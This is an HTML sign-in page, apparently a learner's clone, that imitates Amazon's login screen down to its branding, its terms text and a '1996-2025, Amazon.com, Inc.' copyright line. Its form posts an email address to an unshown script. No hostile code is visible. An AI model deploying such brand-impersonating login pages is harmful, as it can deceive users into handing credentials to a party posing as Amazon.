<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Amazone Sign In</title>

    <link
      rel="stylesheet"
      href=" https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css"
    />
    <link rel="stylesheet" href="/public/login.css" />
    <link rel="icon" type="image/png" href="logo.jpg" />
  </head>
  <body>
    <div class="final">
      <div class="amazonlogo">
        <img src="/public/Screenshot 2025-02-20 115225.png" alt="" id="logoimg" />
      </div>

      <div class="mainbox" id="boxn2">
        <div class="box3">
          <div class="box">
            <h1 id="h1">Sign in</h1>
            <form method="post" id="login-form">
            <label for="Email or phone details" id="eid" name="email"
              >Email only</label
            >
            <input
              type="email"
              id="email-input"
              maxlength="32"
              minlength="10"
              required
              name="email"
            />
            <br />
            <div id="email-error" style="color:red"></div>
            <div class="section1">
              <button id="btn1" type="submit" >Continue</button>
            </form>
              <div id="textbox">
                By continuing, you agree to Amazon's
                <a href="" class="a">Conditions of Use </a> and
                <a href="" class="a">Privacy Notice.</a>
              </div>
            </div>

            <div class="row-expend">
              <div class="need">
                <i class="fa-solid fa-angle-down" id="arrow"></i>
                <span id="s1" class="a2">Need help?</span>
              </div>
            </div>
            <hr class="row-gap" />
            <div class="sec2">
              <span id="s2">Buying for work?</span>
            </div>
            <span id="s3" class="a2">Shope on Amazon Business</span>
          </div>
          <div class="space"></div>
          <div class="midct">
            <div class="underline">
              <h5 id="h5">New to Amazon?</h5>
            </div>
            <button id="btncr">Create your Amazon account</button>
          </div>
        </div>
      </div>

      <div class="fotter">
        <div class="space1">
          <div class="endline">
            <hr id="hr1" />
          </div>
          <div class="blankdiv"></div>
          <div class="spaces"></div>
          <div class="ursupport">
            <div class="urs1">
              <li><a href="" id="a1" class="">Conditions of Use</a></li>
              <li><a href="" id="a2">Privacy Notice</a></li>
              <li><a href="" id="a3">Help</a></li>
            </div>

            <div class="enddl">
              <span id="spl"
                ><i
                  class="fa-solid fa-headset fa-2xs"
                  style="color: #000000"
                ></i>
                1996-2025, Amazon.com, Inc. or its affiliates</span
              >
            </div>
          </div>
        </div>
      </div>
    </div>
    <script src="/public/login.js"></script>
  </body>
</html>


